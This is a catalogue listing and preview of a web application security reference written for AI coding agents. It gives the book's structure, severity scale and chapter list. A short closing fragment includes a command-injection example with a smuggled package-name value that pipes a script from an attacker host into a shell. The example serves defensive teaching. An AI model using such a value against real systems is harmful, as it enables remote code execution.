CandleKeep
Web Application Security for AI Agents

security, agents, books-for-agents, best-practices
Pages: 39
Format: markdown
Listed: March 10, 2026
Updated: March 18, 2026
Subscribers: 290

About

Agent-optimized webapp security reference

Part of the Pro Library

Get full access to this book and 5 others with CandleKeep Pro. Preview the first 2 pages below.

39 Chapters
238 Topics
39 Pages

Preview

Web Application Security for AI Agents

A comprehensive, agent-optimized reference for building, reviewing, and securing web applications. Written as original content informed by deep study of the field's canonical works, OWASP standards, and current threat research.


How to Use This Book

This book is structured for AI agents that write, review, or audit web application code. Each chapter is self-contained — you can load any chapter independently without reading prior chapters.

Chapter structure:

  • Threat Summary — what this chapter covers (2-3 sentences)
  • Severity — CRITICAL, HIGH, MEDIUM, or LOW
  • Quick Reference — decision table or checklist
  • Core Rules — numbered, actionable principles
  • Examples — vulnerable code vs. secure code, annotated
  • Verification — how to confirm the fix works
  • Common Mistakes — anti-patterns to avoid

When to use this book:

  • Writing new web application code (check relevant chapters before implementation)
  • Reviewing code for security issues (use checklists as review guides)
  • Debugging security vulnerabilities (find the chapter matching the vulnerability class)
  • Designing authentication, authorization, or session management systems

Severity definitions:

  • CRITICAL — Direct path to full system compromise, data breach, or account takeover
  • HIGH — Significant security impact, exploitable without special conditions
  • MEDIUM — Security impact requires specific conditions or user interaction
  • LOW — Minor information disclosure or defense-in-depth concern

Table of Contents

  1. Chapter 1: The Foundational Security Axiom (p. 2)
  2. Chapter 2: Injection Attacks (p. 3)
  3. Chapter 3: Cross-Site Scripting (XSS) (p. 4)
  4. Chapter 4: Authentication Security (p. 5)
  5. Chapter 5: Session Management (p. 6)
  6. Chapter 6: Access Control and Authorization (p. 7)
  7. Chapter 7: API Security (p. 8)
  8. Chapter 8: Server-Side Request Forgery (SSRF) (p. 9)
  9. Chapter 9: Cross-Site Request Forgery (CSRF) (p. 10)
  10. Chapter 10: File Upload Security (p. 11)
  11. Chapter 11: Cryptography and Transport Security (p. 12)
  12. Chapter 12: Security Headers and Browser Defenses (p. 13)
  13. Chapter 13: Client-Side Security (p. 14)
  14. Chapter 14: Business Logic Vulnerabilities (p. 15)
  15. Chapter 15: Supply Chain Security (p. 16)
  16. Chapter 16: Cloud-Native Web Security (p. 17)
  17. Chapter 17: Deserialization Attacks (p. 18)
  18. Chapter 18: Race Conditions (p. 19)
  19. Chapter 19: Path Traversal and File Access (p. 20)
  20. Chapter 20: Error Handling and Information Disclosure (p. 21)
  21. Chapter 21: Security Testing Methodology (p. 22)
  22. Chapter 22: Secure Development Checklist (p. 23)
  23. Chapter 23: Secure Design Patterns (p. 24)
  24. Chapter 24: Server-Side JavaScript Security (p. 25)
  25. Chapter 25: Modern Framework Security (p. 26)
  26. Chapter 26: ORM and Database Layer Security (p. 27)
  27. Chapter 27: Payment and Financial Security (p. 28)
  28. Chapter 28: Security Logging, Monitoring, and Audit Trails (p. 29)
  29. Chapter 29: Credential Lifecycle Management (p. 30)
  30. Chapter 30: Privacy, Data Protection, and Compliance (p. 31)
  31. Chapter 31: Server-Generated Code and Dynamic Output Injection (p. 32)
  32. Chapter 32: Middleware Architecture and Route Security (p. 33)

Table of Contents

  • VULNERABLE — user-controlled package name interpolated into shell script
  • If packageName is "lodash; curl attacker.com/steal.sh | sh", the command becomes: pip install lodash; curl attacker.com/steal.sh | sh
  • VULNERABLE — server generates an install script with user's project name

Enhancements to Existing Chapters